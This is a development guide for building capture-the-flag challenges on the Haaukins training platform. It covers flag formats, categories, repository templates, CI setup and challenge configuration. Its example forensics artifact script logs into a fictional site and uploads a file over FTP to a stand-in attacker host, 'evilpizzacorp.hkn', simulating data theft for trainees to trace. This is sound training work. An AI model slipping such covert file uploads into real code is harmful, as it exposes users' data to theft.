<!DOCTYPE html>
    <html>
      <head>
        <title>Haaukins Challenge Guide</title>
        <meta name="viewport" content="width=device-width, initial-scale=1">
	<meta charset="utf-8">
      </head>
      <body>
        <div id='content'>
    <h1 id="haaukins-challenge-development-guide">Haaukins challenge development guide</h1>
    <p>This guide will take you through making a challenge for Haaukins, no
      matter the context. But first it will go some of the preliminary
      concepts in Haaukins like static and dynamic challenges, flag formats
      and a short description of the different categories.</p>
      <h1 id="haaukins-challenge-reach-out">Got questions related to DDC?</h1>
      For any challenge development or merge request-related concerns, please reach out to Amar,
      <a href="mailto:amar@campfiresecurity.com">amar@campfiresecurity.com</a> <br>
      If you have other inquiries, feel free to contact Severen, 
      <a href="mailto:severenjf@es.aau.dk">severenjf@es.aau.dk</a>, and they’ll be happy to assist you.
      <h1 id="challenge-formats">Challenge formats</h1>
      <p>Haaukins has two challenge types static and dynamic and is a
      separation of challenges with a remote host and those that only consists
      of an artifact that should be downloaded and analyzed.</p>
      <h2 id="static-challenge">Static Challenge</h2>
      <p>Static challenges is challenges that only consists of a downloadable
      artifact in which the flag is found. This also mean that the flags found
      in static challenges will also be static, see more about this in <a
      href="#flag-formats">Flag Formats</a>. An example challenge could be a
      cryptography challenge where the participant is given one or more text
      files containing parameters for example an RSA challenge. In this case
      the file/files is compressed in a zip archive which is uploaded to the
      Haaukins Nextcloud server, and a download link is added to the challenge
      description. See <a href="#static-challenge-1">Static Challenge</a> for
      a more in-depth description on how to create, test and deploy a static
      challenge to Haaukins.</p>
      <p>If you need to upload a file to Nextcloud and don’t have a login
      please send an email to <a
      href="mailto:mreite23@student.aau.dk">mreite23@student.aau.dk</a>.</p>
      <h2 id="dynamic-challenge">Dynamic challenge</h2>
      <p>Dynamic challenges is challenges where the user will need to interact
      with a remote host to get the flag, this could be a website or some
      service for a PWN exercise. The remote should be packed as a Docker
      container. The Docker containers
      should be developed as stand alone containers, but if you need multiple
      containers for your exercises this is also possible and will be
      described in <a href="#dynamic-challenge-1">Dynamic Challenges</a>. One
      thing that is important to mention is that the containers/VMs will not
      have any internet when running in Haaukins so all dependencies should be
      included when building the Docker image, also try to minimize the size
      of the images by using the slim versions of the base images.</p>
      <p>Just because a challenge is dynamic doesn’t mean that it cannot have
      a downloadable artifact, if this is the case follow the same method as a
      static challenge. Compress the files in a ZIP archive and upload it in
      the correct folder on Nextcloud. See <a href="#static-challenge-1">Static Challenge</a> for
      a more in-depth description of how to upload the artifact.</p>
      <h1 id="flag-formats">Flag formats</h1>
      <p>Haaukins has two flag formats that is mainly used, one for De Danske
      Cybermesterskaber(DDC) and one for Haaukins.</p>
      <ul>
      <li><strong>De Danske Cybermesterskaber:</strong><br />
      Use the flag format <code>DDC\{[a-zA-Z0-9-_]{6,50}\}</code> and write in
      the challenge description that the flag is following the DDC
      format.<br />
      Example flags:
      <ul>
      <li><code>DDC{flag_here_in_1337speak}</code></li>
      <li><code>DDC{h4nds_up_7h1s_15_4_r0pp3ry}</code></li>
      <li><code>DDC{771b2f7a-d8f2-48f9-856e-70a83c9dd65c}</code></li>
      </ul></li>
      <li><strong>Haaukins:</strong><br />
      Haaukins supports generating flags for dynamic challenges by setting the
      environment, this feature should be used for all dynamic challenges
      except some cases which will be explained in <a
      href="#dynamic-challenge-1">Dynamic Challenges</a>. However, if the
      challenge falls within these cases or is a static challenge the flag
      should follow the format: <code>HKN\{[a-zA-Z0-9-_]{6,50}\}</code><br />
      Example flags:
      <ul>
      <li><code>HKN{flag_here_in_1337speak}</code></li>
      <li><code>HKN{h4nds_up_7h1s_15_4_r0pp3ry}</code></li>
      <li><code>HKN{771b2f7a-d8f2-48f9-856e-70a83c9dd65c}</code></li>
      </ul></li>
      <li><strong>Other:</strong><br />
      In very few cases other flag formats could be used in these cases the
      flag format should be written in the description of the specific
      challenge.</li>
      </ul>
      <h1 id="categories">Categories</h1>
      <table>
      <colgroup>
      <col style="width: 13%" />
      <col style="width: 5%" />
      <col style="width: 80%" />
      </colgroup>
      <thead>
      <tr class="header">
      <th><strong>Category</strong></th>
      <th><strong>Prefix</strong></th>
      <th><strong>Description</strong></th>
      </tr>
      </thead>
      <tbody>
      <tr class="odd">
      <td>Starters</td>
      <td><code>st_</code></td>
      <td>The Starters category holds all the exercises that are great for
      beginners to take on.</td>
      </tr>
      <tr class="even">
      <td>Forensics</td>
      <td><code>fr_</code></td>
      <td>Forensics covers things like memory analysis, initial enumeration,
      network analysis and stenography.</td>
      </tr>
      <tr class="odd">
      <td>Web Exploitation</td>
      <td><code>we_</code></td>
      <td>Web Exploitation is things like SQL injections, CSRF, XSS, XEE,
      Cookies and other website related exercises.</td>
      </tr>
      <tr class="even">
      <td>Cryptography</td>
      <td><code>cry_</code></td>
      <td>Cryptography is things like breaking hashes, reversing bad
      implementation og algorithms or breaking bad algorithms.</td>
      </tr>
      <tr class="odd">
      <td>Boot 2 Root</td>
      <td><code>b2r_</code></td>
      <td>Exercises where people will need to go from some initial foothold to
      root access to the machine.</td>
      </tr>
      <tr class="even">
      <td>Reverse Engineering</td>
      <td><code>re_</code></td>
      <td>Disassemble software to find and exploit vulnerabilities or bypass
      authentication programs, by making that program think you have entered
      the correct password.</td>
      </tr>
      <tr class="odd">
      <td>Binary (Also known as PWN)</td>
      <td><code>bn_</code></td>
      <td>Find a vulnerability in a binary that allows you to gain
      unauthorized access to a system.</td>
      </tr>
      <tr class="even">
      <td>Misc</td>
      <td><code>mi_</code></td>
      <td>Everything that falls outside the categories described above.</td>
      </tr>
      <tr class="odd">
      <td>Operational Technologies</td>
      <td><code>ot_</code></td>
      <td>Exercises working with OT and IoT specific topics.</td>
      </tr>
      </tbody>
      </table>
      <h1 id="building-my-first-challenge">Building my first challenge</h1>
      <p>This section will take you through creating both a static and dynamic
      challenge for Haaukins, both of which requires that you have access to
      the Haaukins organization on Gitlab, so if you don’t send an email to
      Thomas and Márton on <a href="mailto:mreite23@student.aau.dk,tgm@es.aau.dk">tgm@es.aau.dk and mreite23@student.aau.dk</a> where
      we will get you set up with the access that you need. After gaining
      access to the organization you will need to create a new repository in
      the right subproject, below some example paths is given.</p>
      <ul>
      <li><strong>DDC:</strong></li>
      </ul>
      <div class="sourceCode" id="cb1"><pre
      class="sourceCode bash"><code class="sourceCode bash"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a><span class="ex">gitlab.com/confidential-haaukins/cybermesterskaberne/2024/</span><span class="op">&lt;</span>UNI<span class="op">&gt;</span>/<span class="op">&lt;</span>COMP<span class="op">&gt;</span>/<span class="op">&lt;</span>Challenge-name<span class="op">&gt;</span></span></code></pre></div>
      <ul>
      <li><strong>GAMESS:</strong></li>
      </ul>
      <div class="sourceCode" id="cb2"><pre
      class="sourceCode bash"><code class="sourceCode bash"><span id="cb2-1"><a href="#cb2-1" aria-hidden="true" tabindex="-1"></a><span class="ex">gitlab.com/haaukins/gamess/</span><span class="op">&lt;</span>UNI<span class="op">&gt;</span>/<span class="op">&lt;</span>Challenge-name<span class="op">&gt;</span></span></code></pre></div>
      <ul>
      <li><strong>Haaukins:</strong></li>
      </ul>
      <div class="sourceCode" id="cb3"><pre
      class="sourceCode bash"><code class="sourceCode bash"><span id="cb3-1"><a href="#cb3-1" aria-hidden="true" tabindex="-1"></a><span class="ex">gitlab.com/haaukins/</span><span class="op">&lt;</span>category<span class="op">&gt;</span>/<span class="op">&lt;</span>Challenge-name<span class="op">&gt;</span></span></code></pre></div>
      <p>When creating the repository create it from a template and select
      group, and then select the only one called
      <code>Haaukins/Templates/Challenge-X</code></p>
      <p><img src="./images/new-project.png" alt="New Project" /> <img
      src="./images/template.png" alt="Use Template" /></p>
      <p>This will give you a git repository that you can start developing in,
      when cloning the repository i advise you to use ssh which requires you
      to upload an ssh publickey to your gitlab account, see <a
      href="https://docs.gitlab.com/ee/user/ssh.html">Gitlab ssh</a>. After
      cloning the repository onto you computer you should switch to a branch
      called dev or development, the commands to clone and switch looks like
      bellow, if you are using a GUI you will be on your own with git in this
      guide.</p>
      <div class="sourceCode" id="cb4"><pre
      class="sourceCode bash"><code class="sourceCode bash"><span id="cb4-1"><a href="#cb4-1" aria-hidden="true" tabindex="-1"></a><span class="fu">git</span> clone gitlab.com/haaukins/<span class="op">&lt;</span>category<span class="op">&gt;</span>/<span class="op">&lt;</span>Challenge-name<span class="op">&gt;</span></span>
<span id="cb4-2"><a href="#cb4-2" aria-hidden="true" tabindex="-1"></a><span class="bu">cd</span> <span class="op">&lt;</span>Challenge-name<span class="op">&gt;</span></span>
<span id="cb4-3"><a href="#cb4-3" aria-hidden="true" tabindex="-1"></a><span class="fu">git</span> checkout <span class="at">-b</span> development</span></code></pre></div>
      <p>Before looking into how to build and test each of the two challenge
      types we’ll look at some of the files that are common for the both of
      them and the folder structure found in the template.</p>
      <pre><code>├── challenge-config  
│    └── challenge.yml # File containing the configuration for Haaukins  
├── src # Folder containing the files used for creating the challenge e.g. a python  
│    │  # script for generating network traffic or random pictures.  
│    └── main.py  
├── solution # If the challenge is solvable with a script please put it in this folder.  
│    └── solve.py  
├── .gitlab-ci.yml # Pipelines pushing to Haaukins and Gitlab  
└── readme.md # Document describing the challenge  </code></pre>
      <p>The challenge config will be described in the coming section as it
      will be quite a bit different for the challenge types, i suggest that
      you look at the section that fit your challenge. Otherwise you can use
      the config generator found on https://haaukins.gitlab.io/challengeyml/
      but in most cases i find it easier to just copy an old config and modify
      that. </p>
      <p>The src folder should contain the files used for creating the
      artifact if it is a static file and the source code if it is a remote,
      this will also be described further in the respective folders. We have
      left a python requirements file and a python script in the src for demo
      purposes, you can delete or change it if you don’t need it. The solution
      folder should contain a script that solves the exercise and outputs the
      flag, if it isn’t possible to script the solution delete this folder.
      The .gitlab-ci. depends on you usecase and will be described in the
      related sections, this file can also be generated using the config
      generator.</p>
      <p>The readme can also be generated using the config generator, but is
      just filling out the empty lines in the example below.</p>
      <div class="sourceCode" id="cb6"><pre class="sourceCode md"><code class="sourceCode markdown"><span id="cb6-1"><a href="#cb6-1" aria-hidden="true" tabindex="-1"></a><span class="fu"># &lt;challenge-name&gt;</span></span>
<span id="cb6-2"><a href="#cb6-2" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb6-3"><a href="#cb6-3" aria-hidden="true" tabindex="-1"></a><span class="at">&gt; short description of the challenge </span></span>
<span id="cb6-4"><a href="#cb6-4" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb6-5"><a href="#cb6-5" aria-hidden="true" tabindex="-1"></a><span class="fu">## Flag(s)</span></span>
<span id="cb6-6"><a href="#cb6-6" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb6-7"><a href="#cb6-7" aria-hidden="true" tabindex="-1"></a><span class="ss">- </span><span class="kw">&lt;challenge-name&gt;</span>: <span class="in">`&lt;flag&gt;`</span></span>
<span id="cb6-8"><a href="#cb6-8" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb6-9"><a href="#cb6-9" aria-hidden="true" tabindex="-1"></a><span class="fu">## Nextcloud Link</span></span>
<span id="cb6-10"><a href="#cb6-10" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb6-11"><a href="#cb6-11" aria-hidden="true" tabindex="-1"></a><span class="at">&gt; Only relevant if the challenge contains an artifact </span></span>
<span id="cb6-12"><a href="#cb6-12" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb6-13"><a href="#cb6-13" aria-hidden="true" tabindex="-1"></a><span class="fu">## Proposed difficulty:</span></span>
<span id="cb6-14"><a href="#cb6-14" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb6-15"><a href="#cb6-15" aria-hidden="true" tabindex="-1"></a><span class="at">&gt; Beginner, very easy, easy,..., very hard</span></span>
<span id="cb6-16"><a href="#cb6-16" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb6-17"><a href="#cb6-17" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb6-18"><a href="#cb6-18" aria-hidden="true" tabindex="-1"></a><span class="fu">## Prerequisites &amp; Outcome</span></span>
<span id="cb6-19"><a href="#cb6-19" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb6-20"><a href="#cb6-20" aria-hidden="true" tabindex="-1"></a><span class="fu">### Prerequisites</span></span>
<span id="cb6-21"><a href="#cb6-21" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb6-22"><a href="#cb6-22" aria-hidden="true" tabindex="-1"></a><span class="at">&gt; list of things people should know e.g.</span></span>
<span id="cb6-23"><a href="#cb6-23" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb6-24"><a href="#cb6-24" aria-hidden="true" tabindex="-1"></a><span class="ss">- </span>Wireshark</span>
<span id="cb6-25"><a href="#cb6-25" aria-hidden="true" tabindex="-1"></a><span class="ss">- </span>Basic scripting knowledge </span>
<span id="cb6-26"><a href="#cb6-26" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb6-27"><a href="#cb6-27" aria-hidden="true" tabindex="-1"></a><span class="fu">### Outcome</span></span>
<span id="cb6-28"><a href="#cb6-28" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb6-29"><a href="#cb6-29" aria-hidden="true" tabindex="-1"></a><span class="at">&gt; list of things people should learn from this e.g. </span></span>
<span id="cb6-30"><a href="#cb6-30" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb6-31"><a href="#cb6-31" aria-hidden="true" tabindex="-1"></a><span class="ss">- </span>How to find files send over the network using wireshark</span>
<span id="cb6-32"><a href="#cb6-32" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb6-33"><a href="#cb6-33" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb6-34"><a href="#cb6-34" aria-hidden="true" tabindex="-1"></a><span class="fu">## Solution(s)</span></span>
<span id="cb6-35"><a href="#cb6-35" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb6-36"><a href="#cb6-36" aria-hidden="true" tabindex="-1"></a><span class="at">&gt; step by step solution to the challenge e.g.</span></span>
<span id="cb6-37"><a href="#cb6-37" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb6-38"><a href="#cb6-38" aria-hidden="true" tabindex="-1"></a><span class="fu">### Challenge name (Name of subcallenge if more than one)</span></span>
<span id="cb6-39"><a href="#cb6-39" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb6-40"><a href="#cb6-40" aria-hidden="true" tabindex="-1"></a><span class="ss">- </span>Open wireshark and filter for HTTP post requests.</span>
<span id="cb6-41"><a href="#cb6-41" aria-hidden="true" tabindex="-1"></a><span class="ss">- </span>Identify a POST request send to /login by looking in the info part</span>
<span id="cb6-42"><a href="#cb6-42" aria-hidden="true" tabindex="-1"></a><span class="ss">- </span>Find the credentials send in the request by looking at the html-www-form-urlencoded  </span>
<span id="cb6-43"><a href="#cb6-43" aria-hidden="true" tabindex="-1"></a>  layer of the packet</span>
<span id="cb6-44"><a href="#cb6-44" aria-hidden="true" tabindex="-1"></a><span class="ss">- </span>Use this to login to the website found on either the IP to which the request is going  </span>
<span id="cb6-45"><a href="#cb6-45" aria-hidden="true" tabindex="-1"></a>  or by finding the request URI in the HTTP layer of the packet</span>
<span id="cb6-46"><a href="#cb6-46" aria-hidden="true" tabindex="-1"></a><span class="ss">- </span>See the flag in the top left</span>
<span id="cb6-47"><a href="#cb6-47" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb6-48"><a href="#cb6-48" aria-hidden="true" tabindex="-1"></a><span class="fu">## How to run locally</span></span>
<span id="cb6-49"><a href="#cb6-49" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb6-50"><a href="#cb6-50" aria-hidden="true" tabindex="-1"></a><span class="at">&gt; A few lines describing how people can start the challenge locally</span></span></code></pre></div>
      <h2 id="points">Points</h2>
      <table>
      <thead>
      <tr class="header">
      <th><strong>Difficulty</strong></th>
      <th><strong>Points</strong></th>
      </tr>
      </thead>
      <tbody>
      <tr class="odd">
      <td>Beginner</td>
      <td>1 - 10</td>
      </tr>
      <tr class="even">
      <td>Very easy</td>
      <td>11 -30</td>
      </tr>
      <tr class="odd">
      <td>Easy</td>
      <td>31 - 50</td>
      </tr>
      <tr class="even">
      <td>Medium</td>
      <td>51 - 70</td>
      </tr>
      <tr class="odd">
      <td>Hard</td>
      <td>71 - 85</td>
      </tr>
      <tr class="even">
      <td>Very hard</td>
      <td>86 - 100</td>
      </tr>
      <tr class="odd">
      <td>INSANE</td>
      <td>100+</td>
      </tr>
      </tbody>
      </table>
      <h2 id="static-challenge-1">Static challenge</h2>
      <p>This section will describe how to create a static challenge, which is
      best done by creating an actual challenge. The guide is created as a
      part of the GAMESS project, but it will be very similar for other
      scenarios like DDC or general Haaukins development as the main
      difference is the path, see <a
      href="#building-my-first-challenge">Building my first challenge</a> for
      a short introduction to the different paths.</p>
      <p>Lets start by creating a new project from the Challenge-x
      template.</p>
      <figure>
      <img src="./images/newproject.png" alt="New repo" />
      <figcaption aria-hidden="true">New repo</figcaption>
      </figure>
      <p>Lets start by creating the .gitlab-ci.yml file, as the challenge is
      static this file only needs to push the challenge config to Haaukins,
      this can be done by replacing the file content with the following code
      snippet.</p>
      <div class="sourceCode" id="cb7"><pre
      class="sourceCode yml"><code class="sourceCode yaml"><span id="cb7-1"><a href="#cb7-1" aria-hidden="true" tabindex="-1"></a><span class="fu">push-to-challenge-service</span><span class="kw">:</span></span>
<span id="cb7-2"><a href="#cb7-2" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">image</span><span class="kw">:</span><span class="at"> ubuntu:latest</span></span>
<span id="cb7-3"><a href="#cb7-3" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">stage</span><span class="kw">:</span><span class="at"> build</span></span>
<span id="cb7-4"><a href="#cb7-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">before_script</span><span class="kw">:</span></span>
<span id="cb7-5"><a href="#cb7-5" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> apt-get update -y</span></span>
<span id="cb7-6"><a href="#cb7-6" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> apt-get install -y wget </span></span>
<span id="cb7-7"><a href="#cb7-7" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> apt-get install -y zip </span></span>
<span id="cb7-8"><a href="#cb7-8" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> wget https://github.com/mrtrkmnhub/cservice-cli/releases/download/1.0.0/cservice-cli_1.0.0_linux_64-bit.zip </span></span>
<span id="cb7-9"><a href="#cb7-9" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> unzip cservice-cli_1.0.0_linux_64-bit.zip </span></span>
<span id="cb7-10"><a href="#cb7-10" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> mv cservice-cli_1.0.0_linux_64-bit/main .</span></span>
<span id="cb7-11"><a href="#cb7-11" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> chmod +x ./main</span></span>
<span id="cb7-12"><a href="#cb7-12" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">script</span><span class="kw">:</span><span class="at"> </span></span>
<span id="cb7-13"><a href="#cb7-13" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> ./main</span></span>
<span id="cb7-14"><a href="#cb7-14" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">only</span><span class="kw">:</span><span class="at"> </span></span>
<span id="cb7-15"><a href="#cb7-15" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> main</span></span>
<span id="cb7-16"><a href="#cb7-16" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">variables</span><span class="kw">:</span></span>
<span id="cb7-17"><a href="#cb7-17" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">ENDPOINT</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;$ENDPOINT&quot;</span></span>
<span id="cb7-18"><a href="#cb7-18" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">PORT</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;$PORT&quot;</span></span>
<span id="cb7-19"><a href="#cb7-19" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">AUTH_KEY</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;$AUTH_KEY&quot;</span></span>
<span id="cb7-20"><a href="#cb7-20" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">SIGN_KEY</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;$SIGN_KEY&quot;</span></span></code></pre></div>
      <p>Now we can create the challenge config file. For the README just fill
      out the fields seen in the example found in the repository as described
      in <a href="#building-my-first-challenge">Building my first
      challenge</a>, skipping the how to run locally part.</p>
      <div class="sourceCode" id="cb8"><pre
      class="sourceCode yml"><code class="sourceCode yaml"><span id="cb8-1"><a href="#cb8-1" aria-hidden="true" tabindex="-1"></a><span class="fu">name</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;Pizza shop&quot;</span><span class="co"> # Insert challenge name here, this is the name found in the admin panel</span></span>
<span id="cb8-2"><a href="#cb8-2" aria-hidden="true" tabindex="-1"></a><span class="fu">tag</span><span class="kw">:</span><span class="at"> fr_pizza-shop</span><span class="co"> # create challenge tag from name and prefix from</span></span>
<span id="cb8-3"><a href="#cb8-3" aria-hidden="true" tabindex="-1"></a><span class="fu">static</span><span class="kw">:</span><span class="at"> </span><span class="ch">true</span><span class="co"> # This should be set to true as it is &quot;just&quot; an artifact people should download</span></span>
<span id="cb8-4"><a href="#cb8-4" aria-hidden="true" tabindex="-1"></a><span class="fu">secret</span><span class="kw">:</span><span class="at"> </span><span class="ch">true</span></span>
<span id="cb8-5"><a href="#cb8-5" aria-hidden="true" tabindex="-1"></a><span class="fu">od</span><span class="kw">: </span><span class="ch">|</span><span class="co"> # Insert content of readme below</span></span>
<span id="cb8-6"><a href="#cb8-6" aria-hidden="true" tabindex="-1"></a>    # Pizza shop</span>
<span id="cb8-7"><a href="#cb8-7" aria-hidden="true" tabindex="-1"></a>    ... </span>
<span id="cb8-8"><a href="#cb8-8" aria-hidden="true" tabindex="-1"></a>      </span>
<span id="cb8-9"><a href="#cb8-9" aria-hidden="true" tabindex="-1"></a><span class="fu">instance</span><span class="kw">:</span></span>
<span id="cb8-10"><a href="#cb8-10" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">image</span><span class="kw">:</span><span class="at"> dummy</span><span class="co"> # Set image as nothing or dummy as not Docker image or virtual box ova is needed</span></span>
<span id="cb8-11"><a href="#cb8-11" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">flags</span><span class="kw">:</span></span>
<span id="cb8-12"><a href="#cb8-12" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="kw">-</span><span class="at"> </span><span class="fu">tag</span><span class="kw">:</span><span class="at"> pizza-shop-0</span><span class="co"> # Challenge tag without prefix and with a number</span></span>
<span id="cb8-13"><a href="#cb8-13" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">name</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;Pizza shop&quot;</span><span class="co"> # Name participants sees</span></span>
<span id="cb8-14"><a href="#cb8-14" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">static</span><span class="kw">:</span><span class="at"> HKN{P1zz4-0v3ns-1s-th3-n3w-3spr3ss0m4ch1n3s}</span><span class="co"> # Some flag uuid or leet speak</span></span>
<span id="cb8-15"><a href="#cb8-15" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">points</span><span class="kw">:</span><span class="at"> </span><span class="dv">15</span><span class="co"> # Point as described in the point section</span></span>
<span id="cb8-16"><a href="#cb8-16" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">category</span><span class="kw">:</span><span class="at"> Forensics</span><span class="co"> # Category of the challenge</span></span>
<span id="cb8-17"><a href="#cb8-17" aria-hidden="true" tabindex="-1"></a><span class="fu">        td</span><span class="kw">: </span><span class="ch">|</span><span class="co"> # Description that the participants sees ending with a download link</span></span>
<span id="cb8-18"><a href="#cb8-18" aria-hidden="true" tabindex="-1"></a>          After a pizza chain monopolized the market, a group of pizza lovers created a secret network to share information about independent pizza places. They called themselves #PizzaConnoisseurs. But one day, a spy from the big pizza chain infiltrated the network and stole all the information. Your task is to uncover how the spy gained access and what crucial information was stolen.</span>
<span id="cb8-19"><a href="#cb8-19" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb8-20"><a href="#cb8-20" aria-hidden="true" tabindex="-1"></a>          [Download](https://nextcloud.haaukins.com/s/asf5G57wQE7e4MH/download)</span></code></pre></div>
      <p>Now it is time to create the downloadable artifact, which is so
      challenge specific that it won’t be covered in depth in this guide. But
      an example could be the script below that send requests to a server and
      after finishing it will upload a file to a FTP server.</p>
      <div class="sourceCode" id="cb9"><pre
      class="sourceCode python"><code class="sourceCode python"><span id="cb9-1"><a href="#cb9-1" aria-hidden="true" tabindex="-1"></a><span class="im">import</span> time</span>
<span id="cb9-2"><a href="#cb9-2" aria-hidden="true" tabindex="-1"></a><span class="im">import</span> random</span>
<span id="cb9-3"><a href="#cb9-3" aria-hidden="true" tabindex="-1"></a><span class="im">import</span> requests</span>
<span id="cb9-4"><a href="#cb9-4" aria-hidden="true" tabindex="-1"></a><span class="im">from</span> ftplib <span class="im">import</span> FTP</span>
<span id="cb9-5"><a href="#cb9-5" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb9-6"><a href="#cb9-6" aria-hidden="true" tabindex="-1"></a>time.sleep(<span class="dv">200</span>)</span>
<span id="cb9-7"><a href="#cb9-7" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb9-8"><a href="#cb9-8" aria-hidden="true" tabindex="-1"></a>body <span class="op">=</span> {</span>
<span id="cb9-9"><a href="#cb9-9" aria-hidden="true" tabindex="-1"></a>    <span class="st">&quot;username&quot;</span>:<span class="st">&quot;pizzamand&quot;</span>,</span>
<span id="cb9-10"><a href="#cb9-10" aria-hidden="true" tabindex="-1"></a>    <span class="st">&quot;password&quot;</span>:<span class="st">&quot;Tipo00ParmigianoSalami&quot;</span></span>
<span id="cb9-11"><a href="#cb9-11" aria-hidden="true" tabindex="-1"></a>}</span>
<span id="cb9-12"><a href="#cb9-12" aria-hidden="true" tabindex="-1"></a>requests.post(<span class="st">&quot;http://pizzaentusiast.hkn/login&quot;</span>, data<span class="op">=</span>body, verify<span class="op">=</span><span class="va">False</span>)</span>
<span id="cb9-13"><a href="#cb9-13" aria-hidden="true" tabindex="-1"></a>time.sleep(random.uniform(<span class="dv">1</span>,<span class="dv">5</span>))</span>
<span id="cb9-14"><a href="#cb9-14" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb9-15"><a href="#cb9-15" aria-hidden="true" tabindex="-1"></a>requests.get(<span class="st">&quot;http://pizzaentusiast.hkn/reviews&quot;</span>, verify<span class="op">=</span><span class="va">False</span>)</span>
<span id="cb9-16"><a href="#cb9-16" aria-hidden="true" tabindex="-1"></a>time.sleep(random.uniform(<span class="dv">1</span>,<span class="dv">5</span>))</span>
<span id="cb9-17"><a href="#cb9-17" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb9-18"><a href="#cb9-18" aria-hidden="true" tabindex="-1"></a>requests.get(<span class="st">&quot;https://pizzaentusiast.hkn/reviews/2jk3h12kj38&quot;</span>, verify<span class="op">=</span><span class="va">False</span>)</span>
<span id="cb9-19"><a href="#cb9-19" aria-hidden="true" tabindex="-1"></a>time.sleep(random.uniform(<span class="dv">1</span>,<span class="dv">5</span>))</span>
<span id="cb9-20"><a href="#cb9-20" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb9-21"><a href="#cb9-21" aria-hidden="true" tabindex="-1"></a>ftp <span class="op">=</span> FTP(<span class="st">&quot;evilpizzacorp.hkn&quot;</span>,user<span class="op">=</span><span class="st">&quot;umut&quot;</span>,passwd<span class="op">=</span><span class="st">&quot;SkalDuHaveEnTyrkerPlatte?&quot;</span>)</span>
<span id="cb9-22"><a href="#cb9-22" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb9-23"><a href="#cb9-23" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb9-24"><a href="#cb9-24" aria-hidden="true" tabindex="-1"></a><span class="cf">with</span> <span class="bu">open</span>(<span class="st">&#39;review.txt&#39;</span>, <span class="st">&#39;rb&#39;</span>) <span class="im">as</span> f:</span>
<span id="cb9-25"><a href="#cb9-25" aria-hidden="true" tabindex="-1"></a>    ftp.login(user<span class="op">=</span><span class="st">&quot;umut&quot;</span>,passwd<span class="op">=</span><span class="st">&quot;SkalDuHaveEnTyrkerPlatte?&quot;</span>)</span>
<span id="cb9-26"><a href="#cb9-26" aria-hidden="true" tabindex="-1"></a>    ftp.storbinary(<span class="st">&#39;STOR secretreview.txt&#39;</span>, f)  </span>
<span id="cb9-27"><a href="#cb9-27" aria-hidden="true" tabindex="-1"></a>    f.close()                                   </span>
<span id="cb9-28"><a href="#cb9-28" aria-hidden="true" tabindex="-1"></a>    ftp.quit()</span></code></pre></div>
      <p id="prefixes">After generating the artifact upload it to the respective folder on
      NextCloud e.g. <code>haaukins/gamess/aau</code> and name the ZIP archive
      starting with a prefix, according to the following naming convention continued by the challenge name with a charset of [a-z_]. Then update the challenge description with the link using haaukins.com domain and add a SHA256 of the zip file. 
      <br>
      <p>
        Example: forensics_pizza-shop.zip 
